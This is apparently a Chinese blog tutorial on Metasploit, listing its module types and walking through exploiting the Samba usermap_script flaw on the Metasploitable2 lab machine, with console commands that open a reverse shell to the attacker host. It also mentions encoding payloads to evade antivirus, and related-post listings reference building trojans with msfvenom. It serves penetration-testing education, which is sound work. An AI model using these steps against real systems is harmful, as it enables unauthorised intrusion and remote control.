metasploit渗透

最新推荐文章于 2024-05-29 09:33:01 发布
最新推荐文章于 2024-05-29 09:33:01 发布
阅读量325 收藏 3
点赞数
分类专栏: 渗透工具 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/124273327
版权

metasploit渗透

前言

metasploit是一个开源工具,旨在方便渗透测测试,由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发

一、Metasploit的模块构成

  1. Auxliaries(辅助模块)
  2. Exploit(漏洞利用模块)
  3. Payload(攻击载荷模块)
  4. Post(后期渗透模块)
  5. Encoders(编码工具模块)

二、攻击步骤

  1. 扫描目标及系统
  2. 选择并配置一个漏洞利用模块
  3. 选择并配置一个攻击载荷模块
  4. 选择一个编码技术,用来绕过杀毒软件的查杀
  5. 渗透攻击

三、漏洞利用

目标机准备

Metasploitable2是一个主要用于安全工具测试和演示常见漏洞攻击的特别制作的ubuntu操作系统
安装地址如下:

https://information.rapid7.com/download-metasploitable-2017.html

账号密码都为msfadmin登录
在这里插入图片描述

利用过程

kali中开启msf

msfconsole

在这里插入图片描述

进行靶机版本扫描

nmap -sV ip(这里的ip是靶机的ip)在这里插入图片描述

通过对靶机相关信息的收集然后对exploit和payload进行选择

选取漏洞模块

这里发现开启了samba3.x服务
通过search samba命令查询samba利用漏洞选取合适的漏洞利用模块
在这里插入图片描述
这个是按照漏洞利用难度进行排序
这里采用exploit/multi/samba/usermap_script 漏洞利用模块

use exploit/multi/samba/usermap_script
show payload(查看可利用的攻击载荷模块)
show options(可以查看模块利用条件)

在这里插入图片描述
在这里插入图片描述

这里标有yes的是必须要定义的参数

配置漏洞模块

设置选取的攻击载荷模块

set payload cmd/unix/reverse(这里要注意选择的模块要对应靶机的操作系统这里是Linux)

设置靶机IP

set RHOST 192.168.x.xxx

设置漏洞利用端口号

set RPORT 445

设置发动攻击的主机IP

set LHOST 192.168.x.xxx

在这里插入图片描述

进行攻击

设置完参数发动攻击

exploit/run
在这里插入图片描述

这里就会在攻击机和目标机之间建立一个shell连接,就可以通过命令进行执行任意命令
然后输入hostname/uname -a/ifconfig…命令即可进行查询

just a leaf
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试】Metasploit从入门到精通(1)
m0_70746078的博客
09-25 1581
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安全性。
Metasploit渗透
ahoo110的博客
09-07 1310
本篇讲常见漏洞的使用. 1.漏洞利用 1.1 ms08_067(CVE-2008-4250)入侵WinXP-SP3 互相ping通网络;关闭防火墙 1 测试环境 LHOST(攻击机): Win7-安装Metasploit环境 RHOST(目标机): WinXP-SP3-本次测试用的虚拟机环境 2 攻击过程 2.1配置网络环境,确定攻击机...
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
最新发布
天下著书立传者,皆为我师
05-29 897
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
Metasploit 渗透测试
小能猫的博客
01-18 4106
┌──(root????kali)-[/home/kali/Desktop] └─# service postgresql start ┌──(root????kali)-[/home/kali/Desktop] └─# msfdb init [i] Database already started [+] Creating database user 'msf'...
Metasploit渗透测试
weixin_46019912的博客
04-24 236
环境 : mac 工具 : 终端 开启Metasploit命令: 进入Metasploit文件目录:cd /opt/metasploit-framework/bin/ 安装:./msfdb init 启动Metsqploit:msfconsole 启动apache服务器命令: 启动:sudo apachectl -k start 重启:sudo apachectl -k restart 停止...
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
渗透测试神器之metasploit
weixin_52180702的博客
07-18 2387
metasploit 永恒之蓝漏洞复现
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
保持微笑的博客
01-14 4767
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法) 干货干货干货
Metasploit完成的一次渗透测试
weixin_44996489的博客
03-06 541
Metasploit是一个相当优秀的渗透工具,他不仅有强大的功能,还有简单的操作。这使得Metasploit成为了业内最著名的工具。 我们可以用Metasploit进行很多对目标的攻击操作,例如对计算机的操作系统进行攻击,对目标机的应用程序进行攻击,对客户端发起攻击等等。 它是一个免费的、可下载的框架,通过它可以很容易的获取、开发并对计算机实施漏洞攻击。它本身就附带数百个已知软件漏洞的专业级漏洞攻...
metasploit渗透第一篇
hyty的博客
11-17 905
版权声明:本文为博主原创文章,转载必须写明出处。
Metasploit渗透测试指南学习笔记
Destinylang的博客
01-20 1071
第一章 渗透测试技术基础 渗透测试执行标准 http://www.pentest-standard.org/index.php/Main_Page 技术指南 http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines 1.1 PTES中的渗透测试阶段 1.1.1 前期交互阶段 通常是你与客户组织进行讨论,来确定渗透测试的范...
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 3727
黑客之渗透初学
Metasploit渗透测试学习笔记——1、渗透测试基础内容
Fly_鹏程万里
05-16 1415
为什么要进行渗透测试目前大多数企业都会花费较多的资金来维护其关键的基础设施,防止数据外泄。而渗透测试则是能够识别出这些安全计划中系统弱点与不足之处的一种最为有效的技术方式。通过尝试挫败安全控制措施、绕开防御机制,渗透测试师能够找出攻击者可能攻陷企业安全计划、并对企业带来严重破坏后果的方法。什么是MetasploitMetasploit是一款安全测试工具软件,它是为自动化第实施经典的、常规的、或复杂...
Metasploit(后渗透攻击:web后门)
qq_41453632的博客
12-10 4757
web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 1.meterpreter后门    在metasploit中,...
metasploit渗透jenkins
09-01
Metasploit中,有一些模块可以用于渗透测试Jenkins。其中之一是Jenkins枚举模块(auxiliary/scanner/http/jenkins_enum),它可以用于扫描Jenkins服务器并收集相关信息。使用该模块时,你需要设置目标主机的IP地址...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值